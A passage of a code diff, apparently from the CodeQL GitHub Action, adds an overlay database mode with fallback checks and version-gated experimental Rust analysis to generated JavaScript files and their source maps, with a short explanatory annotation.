,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,IAAA,gCAAgB,EAAC,KAAK,CAAC,EACvB,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,EACN,KAAK,CAAC,OAAO,EACb,KAAK,CAAC,KAAK,CACZ,CAAC;QACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;YACnC,MAAM,IAAA,gCAAgB,EAAC,gBAAgB,CAAC,CAAC;QAC3C,CAAC;QACD,OAAO;IACT,CAAC;IACD,MAAM,SAAS,GAAG,oBAAoB,CAAC,iBAAiB,EAAE,CAAC;IAC3D,MAAM,CAAC,IAAI,CAAC,yBAAyB,IAAA,uCAAuB,EAAC,SAAS,CAAC,GAAG,CAAC,CAAC;IAE5E,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,SAAS,EACT,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,CACP,CAAC;IACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;QACnC,MAAM,YAAY,GAAyB;YACzC,GAAG,gBAAgB;YACnB,GAAG,uBAAuB;YAC1B,UAAU,EAAE,oBAAoB,CAAC,iBAAiB,EAAE;SACrD,CAAC;QACF,MAAM,IAAA,gCAAgB,EAAC,YAAY,CAAC,CAAC;IACvC,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
{"version":3,"file":"init-action-post.js","sourceRoot":"","sources":["../src/init-action-post.ts"],"names":[],"mappings":";AAAA;;;;GAIG;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAEH,oDAAsC;AAEtC,iDAIwB;AACxB,6CAAgD;AAChD,iDAAmD;AACnD,kEAAoD;AACpD,mDAA2C;AAC3C,gFAAkE;AAClE,uCAA6C;AAC7C,6CAAgD;AAChD,mDAOyB;AACzB,iCAA8E;AAO9E,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAClC,MAAM,SAAS,GAAG,IAAI,IAAI,EAAE,CAAC;IAC7B,IAAI,MAA0B,CAAC;IAC/B,IAAI,uBAES,CAAC;IACd,IAAI,CAAC;QACH,qCAAqC;QACrC,IAAA,4BAAa,GAAE,CAAC;QAEhB,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;QAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;QAEjD,MAAM,aAAa,GAAG,IAAA,6BAAgB,GAAE,CAAC;QACzC,MAAM,QAAQ,GAAG,IAAI,wBAAQ,CAC3B,aAAa,EACb,aAAa,EACb,IAAA,oCAAqB,GAAE,EACvB,MAAM,CACP,CAAC;QAEF,MAAM,GAAG,MAAM,IAAA,wBAAS,EAAC,IAAA,oCAAqB,GAAE,EAAE,MAAM,CAAC,CAAC;QAC1D,IAAI,MAAM,KAAK,SAAS,EAAE,CAAC;YACzB,MAAM,CAAC,OAAO,CACZ,iGAAiG,CAClG,CAAC;QACJ,CAAC;aAAM,CAAC;YACN,uBAAuB,GAAG,MAAM,oBAAoB,CAAC,GAAG,CACtD,cAAc,CAAC,mCAAmC,EAClD,6BAAc,EACd,MAAM,EACN,aAAa,EACb,QAAQ,EACR,MAAM,CACP,CAAC;QACJ,CAAC;IACH,CAAC;IAAC,OAAO,cAAc,EAAE,CAAC;QACxB,MAAM,KAAK,GAAG,IAAA,gBAAS,EAAC,cAAc,CAAC,CAAC;QACxC,IAAI,CAAC,SAAS,CAAC,KAAK,CAAC,OAAO,CAAC,CAAC;QAE9B,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,IAAA,gCAAgB,EAAC,KAAK,CAAC,EACvB,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,EACN,KAAK,CAAC,OAAO,EACb,KAAK,CAAC,KAAK,CACZ,CAAC;QACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;YACnC,MAAM,IAAA,gCAAgB,EAAC,gBAAgB,CAAC,CAAC;QAC3C,CAAC;QACD,OAAO;IACT,CAAC;IACD,MAAM,SAAS,GAAG,oBAAoB,CAAC,iBAAiB,EAAE,CAAC;IAC3D,MAAM,CAAC,IAAI,CAAC,yBAAyB,IAAA,uCAAuB,EAAC,SAAS,CAAC,GAAG,CAAC,CAAC;IAE5E,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,SAAS,EACT,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,CACP,CAAC;IACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;QACnC,MAAM,YAAY,GAAyB;YACzC,GAAG,gBAAgB;YACnB,GAAG,uBAAuB;YAC1B,UAAU,EAAE,oBAAoB,CAAC,iBAAiB,EAAE;SACrD,CAAC;QACF,MAAM,CAAC,IAAI,CAAC,2CAA2C,CAAC,CAAC;QACzD,MAAM,IAAA,gCAAgB,EAAC,YAAY,CAAC,CAAC;QACrC,MAAM,CAAC,IAAI,CAAC,wCAAwC,CAAC,CAAC;IACxD,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
34 lib/init-action.js generated
@@ -37,6 +37,7 @@ const fs = __importStar(require("fs"));
 const path = __importStar(require("path"));
 const core = __importStar(require("@actions/core"));
 const io = __importStar(require("@actions/io"));
+const semver = __importStar(require("semver"));
 const uuid_1 = require("uuid");
 const actions_util_1 = require("./actions-util");
 const api_client_1 = require("./api-client");
@@ -49,6 +50,7 @@ const feature_flags_1 = require("./feature-flags");
 const init_1 = require("./init");
 const languages_1 = require("./languages");
 const logging_1 = require("./logging");
+const overlay_database_utils_1 = require("./overlay-database-utils");
 const repository_1 = require("./repository");
 const setup_codeql_1 = require("./setup-codeql");
 const status_report_1 = require("./status-report");
@@ -158,7 +160,7 @@ async function run() {
     const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
     (0, util_1.checkGitHubVersionInRange)(gitHubVersion, logger);
     (0, util_1.checkActionVersion)((0, actions_util_1.getActionVersion)(), gitHubVersion);
-    const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
+    const repositoryNwo = (0, repository_1.getRepositoryNwo)();
     const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
     const jobRunUuid = (0, uuid_1.v4)();
     logger.info(`Job run UUID is ${jobRunUuid}.`);
@@ -227,7 +229,12 @@ async function run() {
         return;
     }
     try {
-        (0, init_1.cleanupDatabaseClusterDirectory)(config, logger);
+        const sourceRoot = path.resolve((0, util_1.getRequiredEnvParam)("GITHUB_WORKSPACE"), (0, actions_util_1.getOptionalInput)("source-root") || "");
+        const overlayDatabaseMode = await (0, init_1.getOverlayDatabaseMode)((await codeql.getVersion()).version, config, sourceRoot, logger);
+        logger.info(`Using overlay database mode: ${overlayDatabaseMode}`);
+        if (overlayDatabaseMode !== overlay_database_utils_1.OverlayDatabaseMode.Overlay) {
+            (0, init_1.cleanupDatabaseClusterDirectory)(config, logger);
+        }
         if (zstdAvailability) {
             await recordZstdAvailability(config, zstdAvailability);
         }
@@ -345,6 +352,26 @@ async function run() {
         logger.info(`Setting C++ build-mode: none to ${value}`);
         core.exportVariable(bmnVar, value);
     }
+    // Set CODEQL_ENABLE_EXPERIMENTAL_FEATURES for rust
+    if (config.languages.includes(languages_1.Language.rust)) {
+        const feat = feature_flags_1.Feature.RustAnalysis;
+        const minVer = feature_flags_1.featureConfig[feat].minimumVersion;
+        const envVar = "CODEQL_ENABLE_EXPERIMENTAL_FEATURES";
+        // if in default setup, it means the feature flag was on when rust was enabled
+        // if the feature flag gets turned off, let's not have rust analysis throwing a configuration error
+        // in that case rust analysis will be disabled only when default setup is refreshed
+        if ((0, actions_util_1.isDefaultSetup)() || (await features.getValue(feat, codeql))) {
+            core.exportVariable(envVar, "true");
+        }
+        if (process.env[envVar] !== "true") {
+            throw new util_1.ConfigurationError(`Experimental and not officially supported Rust analysis requires setting ${envVar}=true in the environment`);
+        }
+        const actualVer = (await codeql.getVersion()).version;
+        if (semver.lt(actualVer, minVer)) {
+            throw new util_1.ConfigurationError(`Experimental rust analysis is supported by CodeQL CLI version ${minVer} or higher, but found version ${actualVer}`);
+        }
+        logger.info("Experimental rust analysis enabled");
+    }
     // Restore dependency cache(s), if they exist.
     if ((0, caching_utils_1.shouldRestoreCache)(config.dependencyCachingEnabled)) {
         await (0, dependency_caching_1.downloadDependencyCaches)(config.languages, logger);
@@ -387,8 +414,7 @@ async function run() {
             core.exportVariable("CODEQL_EXTRACTOR_PYTHON_EXTRACT_STDLIB", "true");
         }
     }
-    const sourceRoot = path.resolve((0, util_1.getRequiredEnvParam)("GITHUB_WORKSPACE"), (0, actions_util_1.getOptionalInput)("source-root") || "");
-    const tracerConfig = await (0, init_1.runInit)(codeql, config, sourceRoot, "Runner.Worker.exe", (0, actions_util_1.getOptionalInput)("registries"), apiDetails, logger);
+    const tracerConfig = await (0, init_1.runInit)(codeql, config, sourceRoot, "Runner.Worker.exe", (0, actions_util_1.getOptionalInput)("registries"), apiDetails, overlayDatabaseMode, logger);
     if (tracerConfig !== undefined) {
         for (const [key, value] of Object.entries(tracerConfig.env)) {
             core.exportVariable(key, value);
File diff suppressed because one or more lines are too long
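Annotation: the new Rust branch above layers three gates: turn the experimental env var on when allowed, fail if it is still off, then fail if the CLI predates the feature's minimumVersion. A condensed sketch with stand-in inputs (the real values come from features.getValue and codeql.getVersion):

    import * as semver from "semver";

    async function gateRustAnalysisSketch(
      isDefaultSetup: boolean, // stand-in for actionsUtil.isDefaultSetup()
      flagEnabled: boolean,    // stand-in for features.getValue(Feature.RustAnalysis)
      cliVersion: string,      // stand-in for (await codeql.getVersion()).version
    ): Promise<void> {
      const envVar = "CODEQL_ENABLE_EXPERIMENTAL_FEATURES";
      const minVer = "2.19.3"; // featureConfig[Feature.RustAnalysis].minimumVersion
      if (isDefaultSetup || flagEnabled) {
        process.env[envVar] = "true";
      }
      if (process.env[envVar] !== "true") {
        throw new Error(`Rust analysis requires ${envVar}=true in the environment`);
      }
      if (semver.lt(cliVersion, minVer)) {
        throw new Error(`Rust analysis needs CodeQL CLI >= ${minVer}, found ${cliVersion}`);
      }
    }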
34 lib/init.js generated
@@ -35,6 +35,7 @@ var __importStar = (this && this.__importStar) || (function () {
 Object.defineProperty(exports, "__esModule", { value: true });
 exports.initCodeQL = initCodeQL;
 exports.initConfig = initConfig;
+exports.getOverlayDatabaseMode = getOverlayDatabaseMode;
 exports.runInit = runInit;
 exports.printPathFiltersWarning = printPathFiltersWarning;
 exports.checkInstallPython311 = checkInstallPython311;
@@ -43,10 +44,13 @@ const fs = __importStar(require("fs"));
 const path = __importStar(require("path"));
 const toolrunner = __importStar(require("@actions/exec/lib/toolrunner"));
 const io = __importStar(require("@actions/io"));
+const semver = __importStar(require("semver"));
 const actions_util_1 = require("./actions-util");
 const codeql_1 = require("./codeql");
 const configUtils = __importStar(require("./config-utils"));
+const git_utils_1 = require("./git-utils");
 const languages_1 = require("./languages");
+const overlay_database_utils_1 = require("./overlay-database-utils");
 const tools_features_1 = require("./tools-features");
 const tracer_config_1 = require("./tracer-config");
 const util = __importStar(require("./util"));
@@ -73,7 +77,33 @@ async function initConfig(inputs, codeql) {
     logger.endGroup();
     return config;
 }
-async function runInit(codeql, config, sourceRoot, processName, registriesInput, apiDetails, logger) {
+async function getOverlayDatabaseMode(codeqlVersion, config, sourceRoot, logger) {
+    const overlayDatabaseMode = process.env.CODEQL_OVERLAY_DATABASE_MODE;
+    if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.Overlay ||
+        overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.OverlayBase) {
+        if (config.buildMode !== util.BuildMode.None) {
+            logger.warning(`Cannot build an ${overlayDatabaseMode} database because ` +
+                `build-mode is set to "${config.buildMode}" instead of "none". ` +
+                "Falling back to creating a normal full database instead.");
+            return overlay_database_utils_1.OverlayDatabaseMode.None;
+        }
+        if (semver.lt(codeqlVersion, overlay_database_utils_1.CODEQL_OVERLAY_MINIMUM_VERSION)) {
+            logger.warning(`Cannot build an ${overlayDatabaseMode} database because ` +
+                `the CodeQL CLI is older than ${overlay_database_utils_1.CODEQL_OVERLAY_MINIMUM_VERSION}. ` +
+                "Falling back to creating a normal full database instead.");
+            return overlay_database_utils_1.OverlayDatabaseMode.None;
+        }
+        if ((await (0, git_utils_1.getGitRoot)(sourceRoot)) === undefined) {
+            logger.warning(`Cannot build an ${overlayDatabaseMode} database because ` +
+                `the source root "${sourceRoot}" is not inside a git repository. ` +
+                "Falling back to creating a normal full database instead.");
+            return overlay_database_utils_1.OverlayDatabaseMode.None;
+        }
+        return overlayDatabaseMode;
+    }
+    return overlay_database_utils_1.OverlayDatabaseMode.None;
+}
+async function runInit(codeql, config, sourceRoot, processName, registriesInput, apiDetails, overlayDatabaseMode, logger) {
     fs.mkdirSync(config.dbLocation, { recursive: true });
     const { registriesAuthTokens, qlconfigFile } = await configUtils.generateRegistries(registriesInput, config.tempDir, logger);
     await configUtils.wrapEnvironment({
@@ -81,7 +111,7 @@ async function runInit(codeql, config, sourceRoot, processName, registriesInput,
         CODEQL_REGISTRIES_AUTH: registriesAuthTokens,
     },
     // Init a database cluster
-    async () => await codeql.databaseInitCluster(config, sourceRoot, processName, qlconfigFile, logger));
+    async () => await codeql.databaseInitCluster(config, sourceRoot, processName, qlconfigFile, overlayDatabaseMode, logger));
     return await (0, tracer_config_1.getCombinedTracerConfig)(codeql, config);
 }
 function printPathFiltersWarning(config, logger) {
lib/init.js.map
@@ -1 +1 @@
{"version":3,"file":"init.js","sourceRoot":"","sources":["../src/init.ts"],"names":[],"mappings":"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"}
{"version":3,"file":"init.js","sourceRoot":"","sources":["../src/init.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AA0BA,gCAyCC;AAED,gCAgBC;AAED,wDAuCC;AAED,0BAoCC;AAED,0DAeC;AAMD,sDAkBC;AAED,0EAkDC;AAjQD,uCAAyB;AACzB,2CAA6B;AAE7B,yEAA2D;AAC3D,gDAAkC;AAClC,+CAAiC;AAEjC,iDAAsE;AAEtE,qCAA+C;AAC/C,4DAA8C;AAE9C,2CAAyC;AACzC,2CAA0D;AAE1D,qEAGkC;AAIlC,qDAAgD;AAChD,mDAAwE;AACxE,6CAA+B;AAExB,KAAK,UAAU,UAAU,CAC9B,UAA8B,EAC9B,UAA4B,EAC5B,OAAe,EACf,OAA2B,EAC3B,iBAA2C,EAC3C,QAA2B,EAC3B,MAAc;IAQd,MAAM,CAAC,UAAU,CAAC,oBAAoB,CAAC,CAAC;IACxC,MAAM,EACJ,MAAM,EACN,yBAAyB,EACzB,WAAW,EACX,YAAY,EACZ,gBAAgB,GACjB,GAAG,MAAM,IAAA,oBAAW,EACnB,UAAU,EACV,UAAU,EACV,OAAO,EACP,OAAO,EACP,iBAAiB,EACjB,MAAM,EACN,QAAQ,EACR,IAAI,CACL,CAAC;IACF,MAAM,MAAM,CAAC,YAAY,EAAE,CAAC;IAC5B,MAAM,CAAC,QAAQ,EAAE,CAAC;IAClB,OAAO;QACL,MAAM;QACN,yBAAyB;QACzB,WAAW;QACX,YAAY;QACZ,gBAAgB;KACjB,CAAC;AACJ,CAAC;AAEM,KAAK,UAAU,UAAU,CAC9B,MAAoC,EACpC,MAAc;IAEd,MAAM,MAAM,GAAG,MAAM,CAAC,MAAM,CAAC;IAC7B,MAAM,CAAC,UAAU,CAAC,6BAA6B,CAAC,CAAC;IACjD,MAAM,MAAM,GAAG,MAAM,WAAW,CAAC,UAAU,CAAC,MAAM,CAAC,CAAC;IACpD,IACE,CAAC,CAAC,MAAM,MAAM,CAAC,eAAe,CAC5B,6BAAY,CAAC,kCAAkC,CAChD,CAAC,EACF,CAAC;QACD,uBAAuB,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IAC1C,CAAC;IACD,MAAM,CAAC,QAAQ,EAAE,CAAC;IAClB,OAAO,MAAM,CAAC;AAChB,CAAC;AAEM,KAAK,UAAU,sBAAsB,CAC1C,aAAqB,EACrB,MAA0B,EAC1B,UAAkB,EAClB,MAAc;IAEd,MAAM,mBAAmB,GAAG,OAAO,CAAC,GAAG,CAAC,4BAA4B,CAAC;IAErE,IACE,mBAAmB,KAAK,4CAAmB,CAAC,OAAO;QACnD,mBAAmB,KAAK,4CAAmB,CAAC,WAAW,EACvD,CAAC;QACD,IAAI,MAAM,CAAC,SAAS,KAAK,IAAI,CAAC,SAAS,CAAC,IAAI,EAAE,CAAC;YAC7C,MAAM,CAAC,OAAO,CACZ,mBAAmB,mBAAmB,oBAAoB;gBACxD,yBAAyB,MAAM,CAAC,SAAS,uBAAuB;gBAChE,0DAA0D,CAC7D,CAAC;YACF,OAAO,4CAAmB,CAAC,IAAI,CAAC;QAClC,CAAC;QACD,IAAI,MAAM,CAAC,EAAE,CAAC,aAAa,EAAE,uDAA8B,CAAC,EAAE,CAAC;YAC7D,MAAM,CAAC,OAAO,CACZ,mBAAmB,mBAAmB,oBAAoB;gBACxD,gCAAgC,uDAA8B,IAAI;gBAClE,0DAA0D,CAC7D,CAAC;YACF,OAAO,4CAAmB,CAAC,IAAI,CAAC;QAClC,CAAC;QACD,IAAI,CAAC,MAAM,IAAA,sBAAU,EAAC,UAAU,CAAC,CAAC,KAAK,SAAS,EAAE,CAAC;YACjD,MAAM,CAAC,OAAO,CACZ,mBAAmB,mBAAmB,oBAAoB;gBACxD,oBAAoB,UAAU,oCAAoC;gBAClE,0DAA0D,CAC7D,CAAC;YACF,OAAO,4CAAmB,CAAC,IAAI,CAAC;QAClC,CAAC;QACD,OAAO,mBAA0C,CAAC;IACpD,CAAC;IACD,OAAO,4CAAmB,CAAC,IAAI,CAAC;AAClC,CAAC;AAEM,KAAK,UAAU,OAAO,CAC3B,MAAc,EACd,MAA0B,EAC1B,UAAkB,EAClB,WAA+B,EAC/B,eAAmC,EACnC,UAAoC,EACpC,mBAAwC,EACxC,MAAc;IAEd,EAAE,CAAC,SAAS,CAAC,MAAM,CAAC,UAAU,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;IAErD,MAAM,EAAE,oBAAoB,EAAE,YAAY,EAAE,GAC1C,MAAM,WAAW,CAAC,kBAAkB,CAClC,eAAe,EACf,MAAM,CAAC,OAAO,EACd,MAAM,CACP,CAAC;IACJ,MAAM,WAAW,CAAC,eAAe,CAC/B;QACE,YAAY,EAAE,UAAU,CAAC,IAAI;QAC7B,sBAAsB,EAAE,oBAAoB;KAC7C;IAED,0BAA0B;IAC1B,KAAK,IAAI,EAAE,CACT,MAAM,MAAM,CAAC,mBAAmB,CAC9B,MAAM,EACN,UAAU,EACV,WAAW,EACX,YAAY,EACZ,mBAAmB,EACnB,MAAM,CACP,CACJ,CAAC;IACF,OAAO,MAAM,IAAA,uCAAuB,EAAC,MAAM,EAAE,MAAM,CAAC,CAAC;AACvD,CAAC;AAED,SAAgB,uBAAuB,CACrC,MAA0B,EAC1B,MAAc;IAEd,qEAAqE;IACrE,sEAAsE;IACtE,IACE,CAAC,MAAM,CAAC,iBAAiB,CAAC,KAAK,EAAE,MAAM;QACrC,MAAM,CAAC,iBAAiB,CAAC,cAAc,CAAC,EAAE,MAAM,CAAC;QACnD,CAAC,MAAM,CAAC,SAAS,CAAC,KAAK,CAAC,6BAAiB,CAAC,EAC1C,CAAC;QACD,MAAM,CAAC,OAAO,CACZ,mGAAmG,CACpG,CAAC;IACJ,CAAC;AACH,CAAC;AAED;;;GAGG;AACI,KAAK,UAAU,qBAAqB,CACzC,SAAqB,EACrB,MAAc;IAEd,IACE,SAAS,CAAC,QAAQ,CAAC,oBAAQ,CAAC,MAAM,CAAC;QACnC,OAAO,CAAC,QAAQ,KAAK,OAAO;QAC5B,CAAC,CAAC,MAAM,MAAM,CAAC,UAAU,EAAE,CAAC,CAAC,QAAQ,EAAE,iBAAiB,EACxD,CAAC;QACD,MAAM,MAAM,GAAG,IAAI,CAAC,OAAO,CACzB,SAAS,EACT,iBAAiB,EACjB,oBAAoB,CACrB,CAAC;QACF,MAAM,IAAI,UAAU,CAAC,UAAU,CAAC,MAAM,EAAE,CAAC,KAAK,CAAC,YAAY,EAAE,IAAI,CAAC,EAAE;YAClE,MAAM;SACP,CAAC,CAAC,IAAI,EAAE,CAAC;IACZ,CAAC;AACH,CAAC;AAED,SAAgB,+
BAA+B,CAC7C,MAA0B,EAC1B,MAAc;AACd,+FAA+F;AAC/F,eAAe;AACf,MAAM,GAAG,EAAE,CAAC,MAAM;IAElB,IACE,EAAE,CAAC,UAAU,CAAC,MAAM,CAAC,UAAU,CAAC;QAChC,CAAC,EAAE,CAAC,QAAQ,CAAC,MAAM,CAAC,UAAU,CAAC,CAAC,MAAM,EAAE;YACtC,EAAE,CAAC,WAAW,CAAC,MAAM,CAAC,UAAU,CAAC,CAAC,MAAM,CAAC,EAC3C,CAAC;QACD,MAAM,CAAC,OAAO,CACZ,kCAAkC,MAAM,CAAC,UAAU,4CAA4C,CAChG,CAAC;QACF,IAAI,CAAC;YACH,MAAM,CAAC,MAAM,CAAC,UAAU,EAAE;gBACxB,KAAK,EAAE,IAAI;gBACX,UAAU,EAAE,CAAC;gBACb,SAAS,EAAE,IAAI;aAChB,CAAC,CAAC;YAEH,MAAM,CAAC,IAAI,CACT,yCAAyC,MAAM,CAAC,UAAU,GAAG,CAC9D,CAAC;QACJ,CAAC;QAAC,OAAO,CAAC,EAAE,CAAC;YACX,MAAM,KAAK,GAAG,mEACZ,IAAA,+BAAgB,EAAC,aAAa,CAAC;gBAC7B,CAAC,CAAC,sCAAsC,MAAM,CAAC,UAAU,IAAI;gBAC7D,CAAC,CAAC,kCAAkC,MAAM,CAAC,UAAU,IAAI;oBACvD,yEACN,iEAAiE,CAAC;YAElE,kGAAkG;YAClG,IAAI,IAAA,iCAAkB,GAAE,EAAE,CAAC;gBACzB,MAAM,IAAI,IAAI,CAAC,kBAAkB,CAC/B,GAAG,KAAK,4GAA4G;oBAClH,sEAAsE,IAAI,CAAC,eAAe,CACxF,CAAC,CACF,EAAE,CACN,CAAC;YACJ,CAAC;iBAAM,CAAC;gBACN,MAAM,IAAI,KAAK,CACb,GAAG,KAAK,sDAAsD;oBAC5D,+EAA+E;oBAC/E,yCAAyC,IAAI,CAAC,eAAe,CAAC,CAAC,CAAC,EAAE,CACrE,CAAC;YAC